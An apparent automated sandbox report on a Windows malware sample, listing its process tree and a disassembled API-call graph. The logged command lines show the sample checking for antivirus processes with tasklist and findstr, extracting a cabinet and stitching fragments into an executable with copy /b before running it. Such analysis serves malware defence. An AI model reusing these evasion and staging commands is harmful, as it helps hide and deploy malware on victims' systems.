                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0z8dWUIZvt%2F4I041lRdAOdVW%2F48PxXHLhUh2RIAgHrQ6AB6qlbEGEMyEOKpYRauDaBDn8JRpJEZSu8cyzJa6qowmaDCS%2FtmZGoqoJXG%2ByH%2B%2FmEDdeqkJ28HzJ1CjilUxarf3KA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017a0bbc98c0f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1834&rtt_var=726&sent=334&recv=602&lost=0&retrans=0&sent_bytes=2840&recv_bytes=577446&delivery_rate=1467336&cwnd=223&unsent_bytes=0&cid=7eea0ca466e6d677&ts=2475&x=0"


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:03:12:52
                                      Start date:28/12/2024
                                      Path:C:\Users\user\Desktop\BagsThroat.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\BagsThroat.exe"
                                      Imagebase:0x400000
                                      File size:1'112'940 bytes
                                      MD5 hash:3B819D687B2BDE89ADE8EB1AEB4C6C5F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:03:12:53
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmd
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:03:12:53
                                      Start date:28/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:03:12:55
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0xb60000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:03:12:55
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /I "opssvc wrsa"
                                      Imagebase:0xde0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0xb60000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                      Imagebase:0xde0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c md 441412
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                      Wow64 process (32bit):true
                                      Commandline:extrac32 /Y /E Discovered
                                      Imagebase:0xfc0000
                                      File size:29'184 bytes
                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /V "Detailed" Eat
                                      Imagebase:0xde0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c copy /b 441412\Noted.com + Button + Pledge + Ve + Michael + Barely + Managers + Boolean + Speeches + Heights + Tim 441412\Noted.com
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:03:12:57
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c copy /b ..\Portrait + ..\Colored + ..\Classic + ..\Overseas + ..\Theaters + ..\Plays + ..\Continued S
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:03:12:57
                                      Start date:28/12/2024
                                      Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      Wow64 process (32bit):true
                                      Commandline:Noted.com S
                                      Imagebase:0x8b0000
                                      File size:947'288 bytes
                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:03:12:57
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\choice.exe
                                      Wow64 process (32bit):true
                                      Commandline:choice /d y /t 5
                                      Imagebase:0xb50000
                                      File size:28'160 bytes
                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:18.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.9%
                                        Total number of Nodes:1481
                                        Total number of Limit Nodes:24
                                        execution_graph 4174 402fc0 4175 401446 18 API calls 4174->4175 4176 402fc7 4175->4176 4177 401a13 4176->4177 4178 403017 4176->4178 4179 40300a 4176->4179 4181 406831 18 API calls 4178->4181 4180 401446 18 API calls 4179->4180 4180->4177 4181->4177 4182 4023c1 4183 40145c 18 API calls 4182->4183 4184 4023c8 4183->4184 4187 407296 4184->4187 4190 406efe CreateFileW 4187->4190 4191 406f30 4190->4191 4192 406f4a ReadFile 4190->4192 4193 4062cf 11 API calls 4191->4193 4194 4023d6 4192->4194 4197 406fb0 4192->4197 4193->4194 4195 406fc7 ReadFile lstrcpynA lstrcmpA 4195->4197 4198 40700e SetFilePointer ReadFile 4195->4198 4196 40720f CloseHandle 4196->4194 4197->4194 4197->4195 4197->4196 4199 407009 4197->4199 4198->4196 4200 4070d4 ReadFile 4198->4200 4199->4196 4201 407164 4200->4201 4201->4199 4201->4200 4202 40718b SetFilePointer GlobalAlloc ReadFile 4201->4202 4203 4071eb lstrcpynW GlobalFree 4202->4203 4204 4071cf 4202->4204 4203->4196 4204->4203 4204->4204 4205 401cc3 4206 40145c 18 API calls 4205->4206 4207 401cca lstrlenW 4206->4207 4208 4030dc 4207->4208 4209 4030e3 4208->4209 4211 405f7d wsprintfW 4208->4211 4211->4209 4212 401c46 4213 40145c 18 API calls 4212->4213 4214 401c4c 4213->4214 4215 4062cf 11 API calls 4214->4215 4216 401c59 4215->4216 4217 406cc7 81 API calls 4216->4217 4218 401c64 4217->4218 4219 403049 4220 401446 18 API calls 4219->4220 4221 403050 4220->4221 4222 406831 18 API calls 4221->4222 4223 401a13 4221->4223 4222->4223 4224 40204a 4225 401446 18 API calls 4224->4225 4226 402051 IsWindow 4225->4226 4227 4018d3 4226->4227 4228 40324c 4229 403277 4228->4229 4230 40325e SetTimer 4228->4230 4231 4032cc 4229->4231 4232 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4229->4232 4230->4229 4232->4231 4233 4022cc 4234 40145c 18 API calls 4233->4234 4235 4022d3 4234->4235 4236 406301 2 API calls 4235->4236 4237 4022d9 4236->4237 4239 4022e8 4237->4239 4242 405f7d wsprintfW 4237->4242 4240 4030e3 4239->4240 4243 405f7d wsprintfW 4239->4243 4242->4239 4243->4240 4244 4030cf 4245 40145c 18 API calls 4244->4245 4246 4030d6 4245->4246 4248 4030dc 4246->4248 4251 4063d8 GlobalAlloc lstrlenW 4246->4251 4249 4030e3 4248->4249 4278 405f7d wsprintfW 4248->4278 4252 406460 4251->4252 4253 40640e 4251->4253 4252->4248 4254 40643b GetVersionExW 4253->4254 4279 406057 CharUpperW 4253->4279 4254->4252 4255 40646a 4254->4255 4256 406490 LoadLibraryA 4255->4256 4257 406479 4255->4257 4256->4252 4260 4064ae GetProcAddress GetProcAddress GetProcAddress 4256->4260 4257->4252 4259 4065b1 GlobalFree 4257->4259 4261 4065c7 LoadLibraryA 4259->4261 4262 406709 FreeLibrary 4259->4262 4263 406621 4260->4263 4267 4064d6 4260->4267 4261->4252 4265 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4261->4265 4262->4252 4264 40667d FreeLibrary 4263->4264 4266 406656 4263->4266 4264->4266 4265->4263 4270 406716 4266->4270 4275 4066b1 lstrcmpW 4266->4275 4276 4066e2 CloseHandle 4266->4276 4277 406700 CloseHandle 4266->4277 4267->4263 4268 406516 4267->4268 4269 4064fa FreeLibrary GlobalFree 4267->4269 4268->4259 4271 406528 lstrcpyW OpenProcess 4268->4271 4273 40657b CloseHandle CharUpperW lstrcmpW 4268->4273 4269->4252 4272 40671b CloseHandle FreeLibrary 4270->4272 4271->4268 4271->4273 4274 406730 CloseHandle 4272->4274 4273->4263 4273->4268 4274->4272 4275->4266 4275->4274 4276->4266 4277->4262 4278->4249 4279->4253 4280 4044d1 4281 40450b 4280->4281 4282 40453e 4280->4282 4348 405cb0 GetDlgItemTextW 4281->4348 4283 40454b GetDlgItem GetAsyncKeyState 4282->4283 4287 4045dd 4282->4287 4285 40456a GetDlgItem 4283->4285 4298 404588 4283->4298 4290 403d6b 19 API calls 4285->4290 4286 4046c9 4346 40485f 4286->4346 4350 405cb0 GetDlgItemTextW 4286->4350 4287->4286 4295 406831 18 API calls 4287->4295 4287->4346 4288 404516 4289 406064 5 API calls 4288->4289 4291 40451c 4289->4291 4293 40457d ShowWindow 4290->4293 4294 403ea0 5 API calls 4291->4294 4293->4298 4299 404521 GetDlgItem 4294->4299 4300 40465b SHBrowseForFolderW 4295->4300 4296 4046f5 4301 4067aa 18 API calls 4296->4301 4297 403df6 8 API calls 4302 404873 4297->4302 4303 4045a5 SetWindowTextW 4298->4303 4307 405d85 4 API calls 4298->4307 4304 40452f IsDlgButtonChecked 4299->4304 4299->4346 4300->4286 4306 404673 CoTaskMemFree 4300->4306 4311 4046fb 4301->4311 4305 403d6b 19 API calls 4303->4305 4304->4282 4309 4045c3 4305->4309 4310 40674e 3 API calls 4306->4310 4308 40459b 4307->4308 4308->4303 4315 40674e 3 API calls 4308->4315 4312 403d6b 19 API calls 4309->4312 4313 404680 4310->4313 4351 406035 lstrcpynW 4311->4351 4316 4045ce 4312->4316 4317 4046b7 SetDlgItemTextW 4313->4317 4322 406831 18 API calls 4313->4322 4315->4303 4349 403dc4 SendMessageW 4316->4349 4317->4286 4318 404712 4320 406328 3 API calls 4318->4320 4329 40471a 4320->4329 4321 4045d6 4323 406328 3 API calls 4321->4323 4324 40469f lstrcmpiW 4322->4324 4323->4287 4324->4317 4327 4046b0 lstrcatW 4324->4327 4325 40475c 4352 406035 lstrcpynW 4325->4352 4327->4317 4328 404765 4330 405d85 4 API calls 4328->4330 4329->4325 4333 40677d 2 API calls 4329->4333 4335 4047b1 4329->4335 4331 40476b GetDiskFreeSpaceW 4330->4331 4334 40478f MulDiv 4331->4334 4331->4335 4333->4329 4334->4335 4336 40480e 4335->4336 4353 4043d9 4335->4353 4337 404831 4336->4337 4339 40141d 80 API calls 4336->4339 4361 403db1 KiUserCallbackDispatcher 4337->4361 4339->4337 4340 4047ff 4342 404810 SetDlgItemTextW 4340->4342 4343 404804 4340->4343 4342->4336 4345 4043d9 21 API calls 4343->4345 4344 40484d 4344->4346 4362 403d8d 4344->4362 4345->4336 4346->4297 4348->4288 4349->4321 4350->4296 4351->4318 4352->4328 4354 4043f9 4353->4354 4355 406831 18 API calls 4354->4355 4356 404439 4355->4356 4357 406831 18 API calls 4356->4357 4358 404444 4357->4358 4359 406831 18 API calls 4358->4359 4360 404454 lstrlenW wsprintfW SetDlgItemTextW 4359->4360 4360->4340 4361->4344 4363 403da0 SendMessageW 4362->4363 4364 403d9b 4362->4364 4363->4346 4364->4363 4365 401dd3 4366 401446 18 API calls 4365->4366 4367 401dda 4366->4367 4368 401446 18 API calls 4367->4368 4369 4018d3 4368->4369 4370 402e55 4371 40145c 18 API calls 4370->4371 4372 402e63 4371->4372 4373 402e79 4372->4373 4374 40145c 18 API calls 4372->4374 4375 405e5c 2 API calls 4373->4375 4374->4373 4376 402e7f 4375->4376 4400 405e7c GetFileAttributesW CreateFileW 4376->4400 4378 402e8c 4379 402f35 4378->4379 4380 402e98 GlobalAlloc 4378->4380 4383 4062cf 11 API calls 4379->4383 4381 402eb1 4380->4381 4382 402f2c CloseHandle 4380->4382 4401 403368 SetFilePointer 4381->4401 4382->4379 4385 402f45 4383->4385 4387 402f50 DeleteFileW 4385->4387 4388 402f63 4385->4388 4386 402eb7 4389 403336 ReadFile 4386->4389 4387->4388 4402 401435 4388->4402 4391 402ec0 GlobalAlloc 4389->4391 4392 402ed0 4391->4392 4393 402f04 WriteFile GlobalFree 4391->4393 4395 40337f 33 API calls 4392->4395 4394 40337f 33 API calls 4393->4394 4396 402f29 4394->4396 4399 402edd 4395->4399 4396->4382 4398 402efb GlobalFree 4398->4393 4399->4398 4400->4378 4401->4386 4403 404f9e 25 API calls 4402->4403 4404 401443 4403->4404 4405 401cd5 4406 401446 18 API calls 4405->4406 4407 401cdd 4406->4407 4408 401446 18 API calls 4407->4408 4409 401ce8 4408->4409 4410 40145c 18 API calls 4409->4410 4411 401cf1 4410->4411 4412 401d07 lstrlenW 4411->4412 4413 401d43 4411->4413 4414 401d11 4412->4414 4414->4413 4418 406035 lstrcpynW 4414->4418 4416 401d2c 4416->4413 4417 401d39 lstrlenW 4416->4417 4417->4413 4418->4416 4419 402cd7 4420 401446 18 API calls 4419->4420 4422 402c64 4420->4422 4421 402d17 ReadFile 4421->4422 4422->4419 4422->4421 4423 402d99 4422->4423 4424 402dd8 4425 4030e3 4424->4425 4426 402ddf 4424->4426 4427 402de5 FindClose 4426->4427 4427->4425 4428 401d5c 4429 40145c 18 API calls 4428->4429 4430 401d63 4429->4430 4431 40145c 18 API calls 4430->4431 4432 401d6c 4431->4432 4433 401d73 lstrcmpiW 4432->4433 4434 401d86 lstrcmpW 4432->4434 4435 401d79 4433->4435 4434->4435 4436 401c99 4434->4436 4435->4434 4435->4436 4437 4027e3 4438 4027e9 4437->4438 4439 4027f2 4438->4439 4440 402836 4438->4440 4453 401553 4439->4453 4441 40145c 18 API calls 4440->4441 4443 40283d 4441->4443 4445 4062cf 11 API calls 4443->4445 4444 4027f9 4446 40145c 18 API calls 4444->4446 4450 401a13 4444->4450 4447 40284d 4445->4447 4448 40280a RegDeleteValueW 4446->4448 4457 40149d RegOpenKeyExW 4447->4457 4449 4062cf 11 API calls 4448->4449 4452 40282a RegCloseKey 4449->4452 4452->4450 4454 401563 4453->4454 4455 40145c 18 API calls 4454->4455 4456 401589 RegOpenKeyExW 4455->4456 4456->4444 4460 4014c9 4457->4460 4465 401515 4457->4465 4458 4014ef RegEnumKeyW 4459 401501 RegCloseKey 4458->4459 4458->4460 4462 406328 3 API calls 4459->4462 4460->4458 4460->4459 4461 401526 RegCloseKey 4460->4461 4463 40149d 3 API calls 4460->4463 4461->4465 4464 401511 4462->4464 4463->4460 4464->4465 4466 401541 RegDeleteKeyW 4464->4466 4465->4450 4466->4465 4467 4040e4 4468 4040ff 4467->4468 4474 40422d 4467->4474 4470 40413a 4468->4470 4498 403ff6 WideCharToMultiByte 4468->4498 4469 404298 4471 40436a 4469->4471 4472 4042a2 GetDlgItem 4469->4472 4478 403d6b 19 API calls 4470->4478 4479 403df6 8 API calls 4471->4479 4475 40432b 4472->4475 4476 4042bc 4472->4476 4474->4469 4474->4471 4477 404267 GetDlgItem SendMessageW 4474->4477 4475->4471 4480 40433d 4475->4480 4476->4475 4484 4042e2 6 API calls 4476->4484 4503 403db1 KiUserCallbackDispatcher 4477->4503 4482 40417a 4478->4482 4483 404365 4479->4483 4485 404353 4480->4485 4486 404343 SendMessageW 4480->4486 4488 403d6b 19 API calls 4482->4488 4484->4475 4485->4483 4489 404359 SendMessageW 4485->4489 4486->4485 4487 404293 4490 403d8d SendMessageW 4487->4490 4491 404187 CheckDlgButton 4488->4491 4489->4483 4490->4469 4501 403db1 KiUserCallbackDispatcher 4491->4501 4493 4041a5 GetDlgItem 4502 403dc4 SendMessageW 4493->4502 4495 4041bb SendMessageW 4496 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4495->4496 4497 4041d8 GetSysColor 4495->4497 4496->4483 4497->4496 4499 404033 4498->4499 4500 404015 GlobalAlloc WideCharToMultiByte 4498->4500 4499->4470 4500->4499 4501->4493 4502->4495 4503->4487 4504 402ae4 4505 402aeb 4504->4505 4506 4030e3 4504->4506 4507 402af2 CloseHandle 4505->4507 4507->4506 4508 402065 4509 401446 18 API calls 4508->4509 4510 40206d 4509->4510 4511 401446 18 API calls 4510->4511 4512 402076 GetDlgItem 4511->4512 4513 4030dc 4512->4513 4514 4030e3 4513->4514 4516 405f7d wsprintfW 4513->4516 4516->4514 4517 402665 4518 40145c 18 API calls 4517->4518 4519 40266b 4518->4519 4520 40145c 18 API calls 4519->4520 4521 402674 4520->4521 4522 40145c 18 API calls 4521->4522 4523 40267d 4522->4523 4524 4062cf 11 API calls 4523->4524 4525 40268c 4524->4525 4526 406301 2 API calls 4525->4526 4527 402695 4526->4527 4528 4026a6 lstrlenW lstrlenW 4527->4528 4530 404f9e 25 API calls 4527->4530 4532 4030e3 4527->4532 4529 404f9e 25 API calls 4528->4529 4531 4026e8 SHFileOperationW 4529->4531 4530->4527 4531->4527 4531->4532 4533 401c69 4534 40145c 18 API calls 4533->4534 4535 401c70 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 401c80 4536->4537 4538 405ccc MessageBoxIndirectW 4537->4538 4539 401a13 4538->4539 4540 402f6e 4541 402f72 4540->4541 4542 402fae 4540->4542 4544 4062cf 11 API calls 4541->4544 4543 40145c 18 API calls 4542->4543 4550 402f9d 4543->4550 4545 402f7d 4544->4545 4546 4062cf 11 API calls 4545->4546 4547 402f90 4546->4547 4548 402fa2 4547->4548 4549 402f98 4547->4549 4552 406113 9 API calls 4548->4552 4551 403ea0 5 API calls 4549->4551 4551->4550 4552->4550 4553 4023f0 4554 402403 4553->4554 4555 4024da 4553->4555 4556 40145c 18 API calls 4554->4556 4557 404f9e 25 API calls 4555->4557 4558 40240a 4556->4558 4561 4024f1 4557->4561 4559 40145c 18 API calls 4558->4559 4560 402413 4559->4560 4562 402429 LoadLibraryExW 4560->4562 4563 40241b GetModuleHandleW 4560->4563 4564 4024ce 4562->4564 4565 40243e 4562->4565 4563->4562 4563->4565 4567 404f9e 25 API calls 4564->4567 4577 406391 GlobalAlloc WideCharToMultiByte 4565->4577 4567->4555 4568 402449 4569 40248c 4568->4569 4570 40244f 4568->4570 4571 404f9e 25 API calls 4569->4571 4572 401435 25 API calls 4570->4572 4575 40245f 4570->4575 4573 402496 4571->4573 4572->4575 4574 4062cf 11 API calls 4573->4574 4574->4575 4575->4561 4576 4024c0 FreeLibrary 4575->4576 4576->4561 4578 4063c9 GlobalFree 4577->4578 4579 4063bc GetProcAddress 4577->4579 4578->4568 4579->4578 3416 402175 3426 401446 3416->3426 3418 40217c 3419 401446 18 API calls 3418->3419 3420 402186 3419->3420 3421 402197 3420->3421 3424 4062cf 11 API calls 3420->3424 3422 4021aa EnableWindow 3421->3422 3423 40219f ShowWindow 3421->3423 3425 4030e3 3422->3425 3423->3425 3424->3421 3427 406831 18 API calls 3426->3427 3428 401455 3427->3428 3428->3418 4580 4048f8 4581 404906 4580->4581 4582 40491d 4580->4582 4583 40490c 4581->4583 4598 404986 4581->4598 4584 40492b IsWindowVisible 4582->4584 4590 404942 4582->4590 4585 403ddb SendMessageW 4583->4585 4587 404938 4584->4587 4584->4598 4588 404916 4585->4588 4586 40498c CallWindowProcW 4586->4588 4599 40487a SendMessageW 4587->4599 4590->4586 4604 406035 lstrcpynW 4590->4604 4592 404971 4605 405f7d wsprintfW 4592->4605 4594 404978 4595 40141d 80 API calls 4594->4595 4596 40497f 4595->4596 4606 406035 lstrcpynW 4596->4606 4598->4586 4600 4048d7 SendMessageW 4599->4600 4601 40489d GetMessagePos ScreenToClient SendMessageW 4599->4601 4603 4048cf 4600->4603 4602 4048d4 4601->4602 4601->4603 4602->4600 4603->4590 4604->4592 4605->4594 4606->4598 3721 4050f9 3722 4052c1 3721->3722 3723 40511a GetDlgItem GetDlgItem GetDlgItem 3721->3723 3724 4052f2 3722->3724 3725 4052ca GetDlgItem CreateThread CloseHandle 3722->3725 3770 403dc4 SendMessageW 3723->3770 3727 405320 3724->3727 3729 405342 3724->3729 3730 40530c ShowWindow ShowWindow 3724->3730 3725->3724 3773 405073 OleInitialize 3725->3773 3731 40537e 3727->3731 3733 405331 3727->3733 3734 405357 ShowWindow 3727->3734 3728 40518e 3740 406831 18 API calls 3728->3740 3735 403df6 8 API calls 3729->3735 3772 403dc4 SendMessageW 3730->3772 3731->3729 3736 405389 SendMessageW 3731->3736 3737 403d44 SendMessageW 3733->3737 3738 405377 3734->3738 3739 405369 3734->3739 3745 4052ba 3735->3745 3744 4053a2 CreatePopupMenu 3736->3744 3736->3745 3737->3729 3743 403d44 SendMessageW 3738->3743 3741 404f9e 25 API calls 3739->3741 3742 4051ad 3740->3742 3741->3738 3746 4062cf 11 API calls 3742->3746 3743->3731 3747 406831 18 API calls 3744->3747 3748 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3746->3748 3749 4053b2 AppendMenuW 3747->3749 3750 405203 SendMessageW SendMessageW 3748->3750 3751 40521f 3748->3751 3752 4053c5 GetWindowRect 3749->3752 3753 4053d8 3749->3753 3750->3751 3754 405232 3751->3754 3755 405224 SendMessageW 3751->3755 3756 4053df TrackPopupMenu 3752->3756 3753->3756 3757 403d6b 19 API calls 3754->3757 3755->3754 3756->3745 3758 4053fd 3756->3758 3759 405242 3757->3759 3760 405419 SendMessageW 3758->3760 3761 40524b ShowWindow 3759->3761 3762 40527f GetDlgItem SendMessageW 3759->3762 3760->3760 3763 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3760->3763 3764 405261 ShowWindow 3761->3764 3765 40526e 3761->3765 3762->3745 3766 4052a2 SendMessageW SendMessageW 3762->3766 3767 40545b SendMessageW 3763->3767 3764->3765 3771 403dc4 SendMessageW 3765->3771 3766->3745 3767->3767 3768 405486 GlobalUnlock SetClipboardData CloseClipboard 3767->3768 3768->3745 3770->3728 3771->3762 3772->3727 3774 403ddb SendMessageW 3773->3774 3778 405096 3774->3778 3775 403ddb SendMessageW 3776 4050d1 OleUninitialize 3775->3776 3777 4062cf 11 API calls 3777->3778 3778->3777 3779 40139d 80 API calls 3778->3779 3780 4050c1 3778->3780 3779->3778 3780->3775 4607 4020f9 GetDC GetDeviceCaps 4608 401446 18 API calls 4607->4608 4609 402116 MulDiv 4608->4609 4610 401446 18 API calls 4609->4610 4611 40212c 4610->4611 4612 406831 18 API calls 4611->4612 4613 402165 CreateFontIndirectW 4612->4613 4614 4030dc 4613->4614 4615 4030e3 4614->4615 4617 405f7d wsprintfW 4614->4617 4617->4615 4618 4024fb 4619 40145c 18 API calls 4618->4619 4620 402502 4619->4620 4621 40145c 18 API calls 4620->4621 4622 40250c 4621->4622 4623 40145c 18 API calls 4622->4623 4624 402515 4623->4624 4625 40145c 18 API calls 4624->4625 4626 40251f 4625->4626 4627 40145c 18 API calls 4626->4627 4628 402529 4627->4628 4629 40253d 4628->4629 4630 40145c 18 API calls 4628->4630 4631 4062cf 11 API calls 4629->4631 4630->4629 4632 40256a CoCreateInstance 4631->4632 4633 40258c 4632->4633 4634 4026fc 4636 402708 4634->4636 4637 401ee4 4634->4637 4635 406831 18 API calls 4635->4637 4637->4634 4637->4635 3781 4019fd 3782 40145c 18 API calls 3781->3782 3783 401a04 3782->3783 3786 405eab 3783->3786 3787 405eb8 GetTickCount GetTempFileNameW 3786->3787 3788 401a0b 3787->3788 3789 405eee 3787->3789 3789->3787 3789->3788 4638 4022fd 4639 40145c 18 API calls 4638->4639 4640 402304 GetFileVersionInfoSizeW 4639->4640 4641 4030e3 4640->4641 4642 40232b GlobalAlloc 4640->4642 4642->4641 4643 40233f GetFileVersionInfoW 4642->4643 4644 402350 VerQueryValueW 4643->4644 4645 402381 GlobalFree 4643->4645 4644->4645 4646 402369 4644->4646 4645->4641 4651 405f7d wsprintfW 4646->4651 4649 402375 4652 405f7d wsprintfW 4649->4652 4651->4649 4652->4645 4653 402afd 4654 40145c 18 API calls 4653->4654 4655 402b04 4654->4655 4660 405e7c GetFileAttributesW CreateFileW 4655->4660 4657 402b10 4658 4030e3 4657->4658 4661 405f7d wsprintfW 4657->4661 4660->4657 4661->4658 4662 4029ff 4663 401553 19 API calls 4662->4663 4664 402a09 4663->4664 4665 40145c 18 API calls 4664->4665 4666 402a12 4665->4666 4667 402a1f RegQueryValueExW 4666->4667 4671 401a13 4666->4671 4668 402a45 4667->4668 4669 402a3f 4667->4669 4670 4029e4 RegCloseKey 4668->4670 4668->4671 4669->4668 4673 405f7d wsprintfW 4669->4673 4670->4671 4673->4668 4674 401000 4675 401037 BeginPaint GetClientRect 4674->4675 4676 40100c DefWindowProcW 4674->4676 4678 4010fc 4675->4678 4679 401182 4676->4679 4680 401073 CreateBrushIndirect FillRect DeleteObject 4678->4680 4681 401105 4678->4681 4680->4678 4682 401170 EndPaint 4681->4682 4683 40110b CreateFontIndirectW 4681->4683 4682->4679 4683->4682 4684 40111b 6 API calls 4683->4684 4684->4682 4685 401f80 4686 401446 18 API calls 4685->4686 4687 401f88 4686->4687 4688 401446 18 API calls 4687->4688 4689 401f93 4688->4689 4690 401fa3 4689->4690 4691 40145c 18 API calls 4689->4691 4692 401fb3 4690->4692 4693 40145c 18 API calls 4690->4693 4691->4690 4694 402006 4692->4694 4695 401fbc 4692->4695 4693->4692 4696 40145c 18 API calls 4694->4696 4697 401446 18 API calls 4695->4697 4698 40200d 4696->4698 4699 401fc4 4697->4699 4701 40145c 18 API calls 4698->4701 4700 401446 18 API calls 4699->4700 4702 401fce 4700->4702 4703 402016 FindWindowExW 4701->4703 4704 401ff6 SendMessageW 4702->4704 4705 401fd8 SendMessageTimeoutW 4702->4705 4707 402036 4703->4707 4704->4707 4705->4707 4706 4030e3 4707->4706 4709 405f7d wsprintfW 4707->4709 4709->4706 4710 402880 4711 402884 4710->4711 4712 40145c 18 API calls 4711->4712 4713 4028a7 4712->4713 4714 40145c 18 API calls 4713->4714 4715 4028b1 4714->4715 4716 4028ba RegCreateKeyExW 4715->4716 4717 4028e8 4716->4717 4722 4029ef 4716->4722 4718 402934 